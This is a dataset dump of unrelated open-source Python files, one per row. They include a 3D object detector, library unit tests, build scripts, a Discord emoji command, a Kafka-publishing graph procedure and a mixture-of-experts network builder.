id
stringlengths 3
8
| content
stringlengths 100
981k
|
---|---|
67088
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import numpy as np
from progress.bar import Bar
import time
import torch
from src.lib.external.nms import soft_nms
from src.lib.models.decode import ddd_decode
from src.lib.models.utils import flip_tensor
from src.lib.utils.image import get_affine_transform
from src.lib.utils.post_process import ddd_post_process
from src.lib.utils.debugger import Debugger
from src.lib.utils.ddd_utils import compute_box_3d, project_to_image, alpha2rot_y
from src.lib.utils.ddd_utils import draw_box_3d, unproject_2d_to_3d
from .base_detector import BaseDetector
class DddDetector(BaseDetector):
def __init__(self, opt):
super(DddDetector, self).__init__(opt)
self.calib = np.array([[707.0493, 0, 604.0814, 45.75831],
[0, 707.0493, 180.5066, -0.3454157],
[0, 0, 1., 0.004981016]], dtype=np.float32)
def pre_process(self, image, scale, calib=None):
height, width = image.shape[0:2]
inp_height, inp_width = self.opt.input_h, self.opt.input_w
c = np.array([width / 2, height / 2], dtype=np.float32)
if self.opt.keep_res:
s = np.array([inp_width, inp_height], dtype=np.int32)
else:
s = np.array([width, height], dtype=np.int32)
trans_input = get_affine_transform(c, s, 0, [inp_width, inp_height])
resized_image = image #cv2.resize(image, (width, height))
inp_image = cv2.warpAffine(
resized_image, trans_input, (inp_width, inp_height),
flags=cv2.INTER_LINEAR)
inp_image = (inp_image.astype(np.float32) / 255.)
inp_image = (inp_image - self.mean) / self.std
images = inp_image.transpose(2, 0, 1)[np.newaxis, ...]
calib = np.array(calib, dtype=np.float32) if calib is not None \
else self.calib
images = torch.from_numpy(images)
meta = {'c': c, 's': s,
'out_height': inp_height // self.opt.down_ratio,
'out_width': inp_width // self.opt.down_ratio,
'calib': calib}
return images, meta
def process(self, images, return_time=False):
with torch.no_grad():
torch.cuda.synchronize()
output = self.model(images)[-1]
output['hm'] = output['hm'].sigmoid_()
output['dep'] = 1. / (output['dep'].sigmoid() + 1e-6) - 1.
wh = output['wh'] if self.opt.reg_bbox else None
reg = output['reg'] if self.opt.reg_offset else None
torch.cuda.synchronize()
forward_time = time.time()
dets = ddd_decode(output['hm'], output['rot'], output['dep'],
output['dim'], wh=wh, reg=reg, K=self.opt.K)
if return_time:
return output, dets, forward_time
else:
return output, dets
def post_process(self, dets, meta, scale=1):
dets = dets.detach().cpu().numpy()
detections = ddd_post_process(
dets.copy(), [meta['c']], [meta['s']], [meta['calib']], self.opt)
self.this_calib = meta['calib']
return detections[0]
def merge_outputs(self, detections):
results = detections[0]
for j in range(1, self.num_classes + 1):
if len(results[j] > 0):
keep_inds = (results[j][:, -1] > self.opt.peak_thresh)
results[j] = results[j][keep_inds]
return results
def debug(self, debugger, images, dets, output, scale=1):
dets = dets.detach().cpu().numpy()
img = images[0].detach().cpu().numpy().transpose(1, 2, 0)
img = ((img * self.std + self.mean) * 255).astype(np.uint8)
pred = debugger.gen_colormap(output['hm'][0].detach().cpu().numpy())
debugger.add_blend_img(img, pred, 'pred_hm')
debugger.add_ct_detection(
img, dets[0], show_box=self.opt.reg_bbox,
center_thresh=self.opt.vis_thresh, img_id='det_pred')
def show_results(self, debugger, image, results):
debugger.add_3d_detection(
image, results, self.this_calib,
center_thresh=self.opt.vis_thresh, img_id='add_pred')
debugger.add_bird_view(
results, center_thresh=self.opt.vis_thresh, img_id='bird_pred')
debugger.show_all_imgs(pause=self.pause)
|
67159
|
import unittest
from onnx import helper
from onnx import onnx_pb as onnx_proto
from onnxconverter_common.decast import decast
class DecastTestCase(unittest.TestCase):
def test_decast(self):
nodes = []
nodes[0:] = [helper.make_node('Identity', ['input1'], ['identity1'])]
nodes[1:] = [helper.make_node('Cast', ['identity1'], ['cast0'], to=1)]
nodes[2:] = [helper.make_node('ReduceSum', ['cast0'], ['reduce0'])]
nodes[3:] = [helper.make_node('Cast', ['reduce0'], ['cast1'], to=6)]
nodes[4:] = [helper.make_node('Identity', ['cast1'], ['output0'])]
input0 = helper.make_tensor_value_info('input1', onnx_proto.TensorProto.FLOAT, [1, 1, 2, 3])
output0 = helper.make_tensor_value_info('output0', onnx_proto.TensorProto.FLOAT, [1, 1, 2, 3])
graph = helper.make_graph(nodes, 'test_graph', [input0], [output0])
model = helper.make_model(graph)
self.assertIsNotNone(model)
converted_model = decast(model, ['ReduceSum'])
self.assertTrue(len(converted_model.graph.node) == 3)
if __name__ == '__main__':
unittest.main()
|
67162
|
from __future__ import print_function
import os
def log_check_call(command, stdin=None, env=None, shell=False, cwd=None):
status, stdout, stderr = log_call(command, stdin, env, shell, cwd)
from subprocess import CalledProcessError
if status != 0:
e = CalledProcessError(status, ' '.join(command), '\n'.join(stderr))
# Fix Pyro4's fixIronPythonExceptionForPickle() by setting the args property,
# even though we use our own serialization (at least I think that's the problem).
# See bootstrapvz.remote.serialize_called_process_error for more info.
setattr(e, 'args', (status, ' '.join(command), '\n'.join(stderr)))
raise e
return stdout
def log_call(command, stdin=None, env=None, shell=False, cwd=None):
import subprocess
import logging
from multiprocessing.dummy import Pool as ThreadPool
from os.path import realpath
command_log = realpath(command[0]).replace('/', '.')
log = logging.getLogger(__name__ + command_log)
if isinstance(command, list):
log.debug('Executing: {command}'.format(command=' '.join(command)))
else:
log.debug('Executing: {command}'.format(command=command))
process = subprocess.Popen(args=command, env=env, shell=shell, cwd=cwd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if stdin is not None:
log.debug(' stdin: ' + stdin)
process.stdin.write(stdin + "\n")
process.stdin.flush()
process.stdin.close()
stdout = []
stderr = []
def handle_stdout(line):
log.debug(line)
stdout.append(line)
def handle_stderr(line):
log.error(line)
stderr.append(line)
handlers = {process.stdout: handle_stdout,
process.stderr: handle_stderr}
def stream_readline(stream):
for line in iter(stream.readline, ''):
handlers[stream](line.strip())
pool = ThreadPool(2)
pool.map(stream_readline, [process.stdout, process.stderr])
pool.close()
pool.join()
process.wait()
return process.returncode, stdout, stderr
def sed_i(file_path, pattern, subst, expected_replacements=1):
replacement_count = inline_replace(file_path, pattern, subst)
if replacement_count != expected_replacements:
from .exceptions import UnexpectedNumMatchesError
msg = ('There were {real} instead of {expected} matches for '
'the expression `{exp}\' in the file `{path}\''
.format(real=replacement_count, expected=expected_replacements,
exp=pattern, path=file_path))
raise UnexpectedNumMatchesError(msg)
def inline_replace(file_path, pattern, subst):
import fileinput
import re
replacement_count = 0
for line in fileinput.input(files=file_path, inplace=True):
(replacement, count) = re.subn(pattern, subst, line)
replacement_count += count
print(replacement, end='')
return replacement_count
def load_json(path):
import json
from json_minify import json_minify
with open(path) as stream:
return json.loads(json_minify(stream.read(), False))
def load_yaml(path):
import yaml
with open(path, 'r') as stream:
return yaml.safe_load(stream)
def load_data(path):
filename, extension = os.path.splitext(path)
if not os.path.isfile(path):
raise Exception('The path {path} does not point to a file.'.format(path=path))
if extension == '.json':
return load_json(path)
elif extension == '.yml' or extension == '.yaml':
return load_yaml(path)
else:
raise Exception('Unrecognized extension: {ext}'.format(ext=extension))
def config_get(path, config_path):
config = load_data(path)
for key in config_path:
config = config.get(key)
return config
def copy_tree(from_path, to_path):
from shutil import copy
for abs_prefix, dirs, files in os.walk(from_path):
prefix = os.path.normpath(os.path.relpath(abs_prefix, from_path))
for path in dirs:
full_path = os.path.join(to_path, prefix, path)
if os.path.exists(full_path):
if os.path.isdir(full_path):
continue
else:
os.remove(full_path)
os.mkdir(full_path)
for path in files:
copy(os.path.join(abs_prefix, path),
os.path.join(to_path, prefix, path))
def rel_path(base, path):
return os.path.normpath(os.path.join(os.path.dirname(base), path))
|
67175
|
import csv
from corpus_util import add_word_continuation_tags
def get_tag_data_from_corpus_file(f):
"""Loads from file into four lists of lists of strings of equal length:
one for utterance iDs (IDs))
one for words (seq),
one for pos (pos_seq)
one for tags (targets)."""
f = open(f)
print "loading data", f.name
count_seq = 0
IDs = []
seq = []
pos_seq = []
targets = []
mappings = []
reader = csv.reader(f, delimiter='\t')
counter = 0
utt_reference = ""
currentWords = []
currentPOS = []
currentTags = []
currentMappings = []
# corpus = "" # can write to file
for ref, map, word, postag, disftag in reader: # mixture of POS and Words
counter += 1
if not ref == "":
if count_seq > 0: # do not reset the first time
# convert to the inc tags
# corpus+=utt_reference #write data to a file for checking
# convert to vectors
seq.append(tuple(currentWords))
pos_seq.append(tuple(currentPOS))
targets.append(tuple(add_word_continuation_tags(currentTags)))
IDs.append(utt_reference)
mappings.append(tuple(currentMappings))
# reset the words
currentWords = []
currentPOS = []
currentTags = []
currentMappings = []
# set the utterance reference
count_seq += 1
utt_reference = ref
currentWords.append(word)
currentPOS.append(postag)
currentTags.append(disftag)
currentMappings.append(map)
# flush
if not currentWords == []:
seq.append(tuple(currentWords))
pos_seq.append(tuple(currentPOS))
targets.append(tuple(add_word_continuation_tags(currentTags)))
IDs.append(utt_reference)
mappings.append(tuple(currentMappings))
assert len(seq) == len(targets) == len(pos_seq)
print "loaded " + str(len(seq)) + " sequences"
f.close()
return (IDs, mappings, seq, pos_seq, targets)
def sort_into_dialogue_speakers(IDs, mappings, utts, pos_tags=None,
labels=None):
"""For each utterance, given its ID get its conversation number and
dialogue participant in the format needed for word alignment files.
Returns a list of tuples:
(speaker, mappings, utts, pos, labels)
"""
dialogue_speaker_dict = dict() # keys are speaker IDs of filename:speaker
# vals are tuples of (mappings, utts, pos_tags, labels)
current_speaker = ""
for ID, mapping, utt, pos, label in zip(IDs,
mappings,
utts,
pos_tags,
labels):
split = ID.split(":")
dialogue = split[0]
speaker = split[1]
# uttID = split[2]
current_speaker = "-".join([dialogue, speaker])
if current_speaker not in dialogue_speaker_dict.keys():
dialogue_speaker_dict[current_speaker] = [[], [], [], []]
dialogue_speaker_dict[current_speaker][0].extend(list(mapping))
dialogue_speaker_dict[current_speaker][1].extend(list(utt))
dialogue_speaker_dict[current_speaker][2].extend(list(pos))
dialogue_speaker_dict[current_speaker][3].extend(list(label))
# turn into 5-tuples
dialogue_speakers = [(key,
dialogue_speaker_dict[key][0],
dialogue_speaker_dict[key][1],
dialogue_speaker_dict[key][2],
dialogue_speaker_dict[key][3])
for key in sorted(dialogue_speaker_dict.keys())]
return dialogue_speakers
def write_corpus_file_add_fake_timings_and_utt_tags(f, target_path,
verbose=False):
target_file = open(target_path, "w")
IDs, mappings, utts, pos_tags, labels = get_tag_data_from_corpus_file(f)
dialogue_speakers = sort_into_dialogue_speakers(IDs,
mappings,
utts,
pos_tags,
labels)
for speaker_name, mapping, utt, pos, label in dialogue_speakers:
if verbose:
print "*" * 30
print speaker_name
print mapping
print utt
print pos
print label
y = raw_input()
if y == "y":
quit()
target_file.write("Speaker: " + speaker_name + "\n")
starts = range(0, len(label))
ends = range(1, len(label)+1)
for m, s, e, w, p, l in zip(mapping, starts, ends, utt, pos, label):
l = "\t".join([m, str(float(s)), str(float(e)), w, p, l])
target_file.write(l + "\n")
target_file.write("\n")
target_file.close()
if __name__ == "__main__":
#f = "../../../stir/python/data/bnc_spoken/BNC-CH_partial_data.csv"
#write_corpus_file_add_fake_timings_and_utt_tags(
# f, f.replace("_data", "_data_timings"))
f = "../../../stir/python/data/pcc/PCC_test_partial_data.csv"
write_corpus_file_add_fake_timings_and_utt_tags(
f, f.replace("_data", "_data_timings"))
if False:
f = "../../../stir/python/data/pcc/PCC_test_partial_data_old.csv"
target = open(f.replace("_data_old", "_data"), "w")
f = open(f)
reader = csv.reader(f, delimiter='\t')
for ref, map, word, postag, disftag in reader: # mixture of POS and Words
if not ref == "":
spl = ref.split(":")
n_ref = ":".join([spl[0], spl[2], spl[1]])
target.write("\t".join([n_ref, map, word, postag, disftag]) + "\n")
else:
target.write("\t".join([ref, map, word, postag, disftag]) + "\n")
target.close()
|
67179
|
from itertools import product
import torch
from dgmc.models import GIN
def test_gin():
model = GIN(16, 32, num_layers=2, batch_norm=True, cat=True, lin=True)
assert model.__repr__() == ('GIN(16, 32, num_layers=2, batch_norm=True, '
'cat=True, lin=True)')
x = torch.randn(100, 16)
edge_index = torch.randint(100, (2, 400), dtype=torch.long)
for cat, lin in product([False, True], [False, True]):
model = GIN(16, 32, 2, True, cat, lin)
out = model(x, edge_index)
assert out.size() == (100, 16 + 2 * 32 if not lin and cat else 32)
assert out.size() == (100, model.out_channels)
|
67226
|
import json
import mgp
import os
from kafka import KafkaProducer
KAFKA_IP = os.getenv('KAFKA_IP', 'kafka')
KAFKA_PORT = os.getenv('KAFKA_PORT', '9092')
@mgp.read_proc
def create(created_objects: mgp.Any
) -> mgp.Record():
created_objects_info = {'vertices': [], 'edges': []}
for obj in created_objects:
if obj['event_type'] == 'created_vertex':
created_object = {
'id': obj['vertex'].id,
'labels': [label.name for label in obj['vertex'].labels],
}
if obj['vertex'].labels[0].name == "SUBMISSION":
created_object.update({
'sentiment': obj['vertex'].properties['sentiment'],
'title': obj['vertex'].properties['title'],
})
elif obj['vertex'].labels[0].name == "COMMENT":
created_object.update({
'sentiment': obj['vertex'].properties['sentiment'],
'body': obj['vertex'].properties['body'],
})
else:
created_object.update({
'name': obj['vertex'].properties['name'],
})
created_objects_info['vertices'].append(created_object)
else:
created_objects_info['edges'].append({
'id': obj['edge'].id,
'type': obj['edge'].type.name,
'from': obj['edge'].from_vertex.id,
'to': obj['edge'].to_vertex.id
})
kafka_producer = KafkaProducer(bootstrap_servers=KAFKA_IP + ':' + KAFKA_PORT)
kafka_producer.send('created_objects', json.dumps(
created_objects_info).encode('utf8'))
return None
|
67257
|
from spaceone.core.service.utils import *
from spaceone.core.service.service import *
__all__ = ['BaseService', 'transaction', 'authentication_handler', 'authorization_handler', 'mutation_handler',
'event_handler', 'check_required', 'append_query_filter', 'change_tag_filter', 'change_timestamp_value',
'change_timestamp_filter', 'change_date_value', 'append_keyword_filter', 'change_only_key']
|
67282
|
import fnmatch
import os
import platform
import subprocess
import sys
import logging
from distutils.version import LooseVersion
from setuptools import setup, Extension
log = logging.getLogger(__name__)
ch = logging.StreamHandler()
log.addHandler(ch)
MIN_GEOS_VERSION = "3.5"
if "all" in sys.warnoptions:
# show GEOS messages in console with: python -W all
log.setLevel(logging.DEBUG)
def get_geos_config(option):
"""Get configuration option from the `geos-config` development utility
The PATH environment variable should include the path where geos-config is located.
"""
try:
stdout, stderr = subprocess.Popen(
["geos-config", option], stdout=subprocess.PIPE, stderr=subprocess.PIPE
).communicate()
except OSError:
return
if stderr and not stdout:
log.warning("geos-config %s returned '%s'", option, stderr.decode().strip())
return
result = stdout.decode().strip()
log.debug("geos-config %s returned '%s'", option, result)
return result
def get_geos_paths():
"""Obtain the paths for compiling and linking with the GEOS C-API
First the presence of the GEOS_INCLUDE_PATH and GEOS_LIBRARY_PATH environment
variables is checked. If they are both present, these are taken.
If one of the two paths was not present, geos-config is called (it should be on the
PATH variable). geos-config provides all the paths.
If geos-config was not found, no additional paths are provided to the extension. It is
still possible to compile in this case using custom arguments to setup.py.
"""
include_dir = os.environ.get("GEOS_INCLUDE_PATH")
library_dir = os.environ.get("GEOS_LIBRARY_PATH")
if include_dir and library_dir:
return {
"include_dirs": [include_dir],
"library_dirs": [library_dir],
"libraries": ["geos_c"],
}
geos_version = get_geos_config("--version")
if not geos_version:
log.warning(
"Could not find geos-config executable. Either append the path to geos-config"
" to PATH or manually provide the include_dirs, library_dirs, libraries and "
"other link args for compiling against a GEOS version >=%s.",
MIN_GEOS_VERSION,
)
return {}
if LooseVersion(geos_version) < LooseVersion(MIN_GEOS_VERSION):
raise ImportError(
"GEOS version should be >={}, found {}".format(
MIN_GEOS_VERSION, geos_version
)
)
libraries = []
library_dirs = []
include_dirs = []
extra_link_args = []
for item in get_geos_config("--cflags").split():
if item.startswith("-I"):
include_dirs.extend(item[2:].split(":"))
for item in get_geos_config("--clibs").split():
if item.startswith("-L"):
library_dirs.extend(item[2:].split(":"))
elif item.startswith("-l"):
libraries.append(item[2:])
else:
extra_link_args.append(item)
return {
"include_dirs": include_dirs,
"library_dirs": library_dirs,
"libraries": libraries,
"extra_link_args": extra_link_args,
}
class PyBind11Include:
def __str__(self):
import pybind11
return pybind11.get_include()
geos_paths = get_geos_paths()
sources = ['pymeos/source/pybind.cpp']
for root, dirnames, filenames in os.walk('./source'):
for filename in fnmatch.filter(filenames, '*.cpp'):
sources.append(os.path.join(root, filename))
include_dirs = ['include', 'pymeos/include', PyBind11Include()] + geos_paths.get("include_dirs", [])
library_dirs = geos_paths.get("library_dirs", [])
libraries = geos_paths.get("libraries", [])
extra_compile_args = []
if platform.system() == "Windows":
extra_compile_args.append('/std:c++14')
else:
extra_compile_args.append('-std=c++14')
extra_compile_args.append('-g0')
extra_link_args = geos_paths.get("extra_link_args", [])
setup(
ext_modules=[
Extension(
'_pymeos',
sources,
include_dirs=include_dirs,
library_dirs=library_dirs,
libraries=libraries,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args,
language='c++',
),
],
)
|
67302
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="coderunner",
version="1.0",
license="MIT",
author="<NAME>",
author_email="<EMAIL>",
description="A judge for your programs, run and test your programs using python",
keywords="judge0 coderunner judge0api codeclassroom",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://codeclassroom.github.io/CodeRunner/",
project_urls={
"Documentation": "https://coderunner.readthedocs.io/en/latest/",
"Source Code": "https://github.com/codeclassroom/CodeRunner",
"Funding": "https://www.patreon.com/bePatron?u=18082750",
"Say Thanks!": "https://github.com/codeclassroom/CodeRunner/issues/new?assignees=&labels=&template=---say-thank-you.md&title=",
"Tracker": "https://github.com/codeclassroom/CodeRunner/issues",
},
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3 :: Only",
"License :: OSI Approved :: MIT License",
"Topic :: Education",
"Topic :: Education",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
"Operating System :: OS Independent",
],
python_requires=">=3.6",
)
|
67303
|
from objects.modulebase import ModuleBase
from objects.permissions import PermissionEmbedLinks, PermissionAttachFiles
from io import BytesIO
from discord import Embed, Colour, File
from constants import ID_REGEX, EMOJI_REGEX
EMOJI_ENDPOINT = 'https://cdn.discordapp.com/emojis/{}'
TWEMOJI_ENDPOINT = 'https://bot.mods.nyc/twemoji/{}.png'
class Module(ModuleBase):
usage_doc = '{prefix}{aliases} <emoji>'
short_doc = 'Allows to get emoji image'
name = 'emoji'
aliases = (name, 'e')
category = 'Discord'
min_args = 1
max_args = 1
bot_perms = (PermissionEmbedLinks(), PermissionAttachFiles())
async def on_call(self, ctx, args, **flags):
e = Embed(colour=Colour.gold())
f = None
text = args[1:]
emoji_id = None
emoji_name = ''
id_match = ID_REGEX.fullmatch(text)
if id_match:
emoji_id = int(id_match.group(0))
else:
emoji_match = EMOJI_REGEX.fullmatch(text)
if emoji_match:
groups = emoji_match.groupdict()
emoji_id = int(groups['id'])
emoji_name = groups['name']
if emoji_id is None:
# thanks discord for this nonsense
text = text.rstrip("\N{VARIATION SELECTOR-16}")
code = '-'.join(map(lambda c: f'{ord(c):x}', text))
async with self.bot.sess.get(TWEMOJI_ENDPOINT.format(code)) as r:
if r.status != 200:
return await ctx.warn('Could not get emoji from input text')
filename = 'emoji.png'
f = File(BytesIO(await r.read()), filename=filename)
e.title = f'TWEmoji'
e.set_image(url=f'attachment://{filename}')
else:
e.set_footer(text=emoji_id)
emoji = self.bot.get_emoji(emoji_id)
if emoji is None:
async with self.bot.sess.get(EMOJI_ENDPOINT.format(emoji_id)) as r:
if r.status != 200:
return await ctx.error('Emoji with given id not found')
filename = f'emoji.{r.content_type[6:]}'
f = File(BytesIO(await r.read()), filename=filename)
e.title = f'Emoji {emoji_name or ""}'
e.set_image(url=f'attachment://{filename}')
else:
e.title = f'Emoji {emoji.name}'
e.set_image(url=emoji.url)
await ctx.send(embed=e, file=f)
|
67311
|
import os
import random
import itertools
vector_template = '''static uint64_t {}[{}] =
{{
{}
}};
'''
max_u64 = 0xffffffffffffffff
max_u64_str = str(hex(max_u64))
def get_random_u64 (size):
return '0x' + (os.urandom(size).hex() if size != 0 else '0')
def print_vectors (name, l):
return vector_template.format(name, str(len(l)), ',\n '.join(l))
def main():
edge_cases = itertools.product(
['0x0', max_u64_str], ['0x0', max_u64_str], ['0x0', '0x1'])
# (size of a, size of b, number of vectors to generate)
configs = [(0,1,10), (1,1,10), (2,2,10), (2,3,10), (3,4,10), (4,4,10),
(5,4,10), (4,5,10), (6,6,10), (7,7,10), (8,8,20)]
a_vectors = []
b_vectors = []
cin_vectors = []
addcarry_res_vectors = []
addcarry_cout_vectors = []
subborrow_res_vectors = []
subborrow_cout_vectors = []
def compute_vector(a, b, cin):
a_vectors.append(a)
b_vectors.append(b)
cin_vectors.append(cin)
addition = int(a, 16) + int(b, 16) + int(cin, 16)
cout = addition // (max_u64 + 1)
res = addition % (max_u64 + 1)
res = max_u64 if res < 0 else res
addcarry_res_vectors.append(hex(res))
addcarry_cout_vectors.append(hex(cout))
subtraction = int(a, 16) - int(b, 16) - int(cin, 16)
if subtraction >= 0:
res = subtraction
cout = 0
else:
res = max_u64 + subtraction + 1
cout = 1
subborrow_res_vectors.append(hex(res))
subborrow_cout_vectors.append(hex(cout))
for c in edge_cases:
compute_vector(*c)
for c in configs:
for i in range(c[2]):
a = get_random_u64(c[0])
b = get_random_u64(c[1])
cin = '0x' + str(random.randint(0,1))
compute_vector(a, b, cin)
with open('uint128-intrinsics_vectors.h', 'w') as f:
f.write('static uint32_t num_vectors = {};\n\n'.format(len(a_vectors)))
f.write(print_vectors('a_vectors', a_vectors))
f.write(print_vectors('b_vectors', b_vectors))
f.write(print_vectors('cin_vectors', cin_vectors))
f.write(print_vectors('addcarry_res_vectors', addcarry_res_vectors))
f.write(print_vectors('addcarry_cout_vectors', addcarry_cout_vectors))
f.write(print_vectors('subborrow_res_vectors', subborrow_res_vectors))
f.write(print_vectors('subborrow_cout_vectors', subborrow_cout_vectors))
main ()
|
67333
|
import tensorflow as tf
from neupy import layers
from neupy.utils import tf_utils, as_tuple
from neupy.layers.base import BaseGraph
__all__ = ('mixture_of_experts',)
def check_if_network_is_valid(network, index):
if not isinstance(network, BaseGraph):
raise TypeError(
"Invalid input, Mixture of experts expects networks/layers"
"in the list of networks, got `{}` instance instead"
"".format(type(network)))
if len(network.input_layers) > 1:
raise ValueError(
"Each network from the mixture of experts has to process single "
"input tensor. Network #{} (0-based indices) has more than one "
"input layer. Input layers: {}"
"".format(index, network.output_layers))
if len(network.output_layers) > 1:
raise ValueError(
"Each network from the mixture of experts has to output single "
"tensor. Network #{} (0-based indices) has more than one output "
"layer. Output layers: {}".format(index, network.output_layers))
if network.input_shape.ndims != 2:
raise ValueError(
"Each network from the mixture of experts has to process "
"only 2-dimensional inputs. Network #{} (0-based indices) "
"processes only {}-dimensional inputs. Input layer's shape: {}"
"".format(index, network.input_shape.ndims, network.input_shape))
def check_if_networks_compatible(networks):
input_shapes = []
output_shapes = []
for i, network in enumerate(networks):
input_shapes.append(network.input_shape)
output_shapes.append(network.output_shape)
for shape in input_shapes:
if not shape.is_compatible_with(input_shapes[0]):
raise ValueError(
"Networks have incompatible input shapes. Shapes: {}"
"".format(tf_utils.shape_to_tuple(input_shapes)))
for shape in output_shapes:
if not shape.is_compatible_with(output_shapes[0]):
raise ValueError(
"Networks have incompatible output shapes. Shapes: {}"
"".format(tf_utils.shape_to_tuple(output_shapes)))
def mixture_of_experts(networks, gating_layer=None):
"""
Generates mixture of experts architecture from the set of
networks that has the same input and output shapes.
Mixture of experts learns to how to mix results from different
networks in order to get better performances. It adds gating layer
that using input data tries to figure out which of the networks
will make better contribution to the final result. The final result
mixes from all networks using different weights. The higher the weight
the larger contribution from the individual layer.
Parameters
----------
networks : list of networks/layers
gating_layer : None or layer
In case if value equal to `None` that the following layer
will be created.
.. code-block:: python
gating_layer = layers.Softmax(len(networks))
Output from the gating layer should be 1D and equal to
the number of networks.
Raises
------
ValueError
In case if there is some problem with input networks
or custom gating layer.
Returns
-------
network
Mixture of experts network that combine all networks into
single one and adds gating layer to it.
Examples
--------
>>> from neupy import algorithms, architectures
>>> from neupy.layers import *
>>>
>>> network = architectures.mixture_of_experts([
... join(
... Input(10),
... Relu(5),
... ),
... join(
... Input(10),
... Relu(33),
... Relu(5),
... ),
... join(
... Input(10),
... Relu(12),
... Relu(25),
... Relu(5),
... ),
... ])
>>> network
(?, 10) -> [... 12 layers ...] -> (?, 5)
>>>
>>> optimizer = algorithms.Momentum(network, step=0.1)
"""
if not isinstance(networks, (list, tuple)):
raise ValueError("Networks should be specified as a list")
for index, network in enumerate(networks):
check_if_network_is_valid(network, index)
check_if_networks_compatible(networks)
input_shape = tf.TensorShape(None)
for network in networks:
input_shape = input_shape.merge_with(network.input_shape)
n_layers_to_combine = len(networks)
n_features = input_shape[1].value
if n_features is None:
raise ValueError(
"Cannot create mixture of experts model, because "
"number of input features is unknown")
if gating_layer is None:
gating_layer = layers.Softmax(n_layers_to_combine)
if not isinstance(gating_layer, layers.BaseLayer):
raise ValueError(
"Invalid type for gating layer. Type: {}"
"".format(type(gating_layer)))
return layers.join(
layers.Input(n_features),
# Note: Gating network should be specified
# as a first parameter.
layers.parallel(*as_tuple(gating_layer, networks)),
layers.GatedAverage(),
)
|
67356
|
import numpy as np
from numpy.linalg import lstsq
from numpy.testing import (assert_allclose, assert_equal, assert_,
run_module_suite, assert_raises)
from scipy.sparse import rand
from scipy.sparse.linalg import aslinearoperator
from scipy.optimize import lsq_linear
A = np.array([
[0.171, -0.057],
[-0.049, -0.248],
[-0.166, 0.054],
])
b = np.array([0.074, 1.014, -0.383])
class BaseMixin(object):
def __init__(self):
self.rnd = np.random.RandomState(0)
def test_dense_no_bounds(self):
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, method=self.method, lsq_solver=lsq_solver)
assert_allclose(res.x, lstsq(A, b)[0])
def test_dense_bounds(self):
# Solutions for comparison are taken from MATLAB.
lb = np.array([-1, -10])
ub = np.array([1, 0])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, lstsq(A, b)[0])
lb = np.array([0.0, -np.inf])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, np.inf), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([0.0, -4.084174437334673]),
atol=1e-6)
lb = np.array([-1, 0])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, np.inf), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([0.448427311733504, 0]),
atol=1e-15)
ub = np.array([np.inf, -5])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (-np.inf, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([-0.105560998682388, -5]))
ub = np.array([-1, np.inf])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (-np.inf, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([-1, -4.181102129483254]))
lb = np.array([0, -4])
ub = np.array([1, 0])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([0.005236663400791, -4]))
def test_dense_rank_deficient(self):
A = np.array([[-0.307, -0.184]])
b = np.array([0.773])
lb = [-0.1, -0.1]
ub = [0.1, 0.1]
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, [-0.1, -0.1])
A = np.array([
[0.334, 0.668],
[-0.516, -1.032],
[0.192, 0.384],
])
b = np.array([-1.436, 0.135, 0.909])
lb = [0, -1]
ub = [1, -0.5]
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.optimality, 0, atol=1e-11)
def test_full_result(self):
lb = np.array([0, -4])
ub = np.array([1, 0])
res = lsq_linear(A, b, (lb, ub), method=self.method)
assert_allclose(res.x, [0.005236663400791, -4])
r = A.dot(res.x) - b
assert_allclose(res.cost, 0.5 * np.dot(r, r))
assert_allclose(res.fun, r)
assert_allclose(res.optimality, 0.0, atol=1e-12)
assert_equal(res.active_mask, [0, -1])
assert_(res.nit < 15)
assert_(res.status == 1 or res.status == 3)
assert_(isinstance(res.message, str))
assert_(res.success)
class SparseMixin(object):
def test_sparse_and_LinearOperator(self):
m = 5000
n = 1000
A = rand(m, n, random_state=0)
b = self.rnd.randn(m)
res = lsq_linear(A, b)
assert_allclose(res.optimality, 0, atol=1e-6)
A = aslinearoperator(A)
res = lsq_linear(A, b)
assert_allclose(res.optimality, 0, atol=1e-6)
def test_sparse_bounds(self):
m = 5000
n = 1000
A = rand(m, n, random_state=0)
b = self.rnd.randn(m)
lb = self.rnd.randn(n)
ub = lb + 1
res = lsq_linear(A, b, (lb, ub))
assert_allclose(res.optimality, 0.0, atol=1e-8)
res = lsq_linear(A, b, (lb, ub), lsmr_tol=1e-13)
assert_allclose(res.optimality, 0.0, atol=1e-8)
res = lsq_linear(A, b, (lb, ub), lsmr_tol='auto')
assert_allclose(res.optimality, 0.0, atol=1e-8)
class TestTRF(BaseMixin, SparseMixin):
method = 'trf'
lsq_solvers = ['exact', 'lsmr']
class TestBVLS(BaseMixin):
method = 'bvls'
lsq_solvers = ['exact']
if __name__ == '__main__':
run_module_suite()
|
67361
|
import base64
from auth_helper import *
from campaignmanagement_example_helper import *
# You must provide credentials in auth_helper.py.
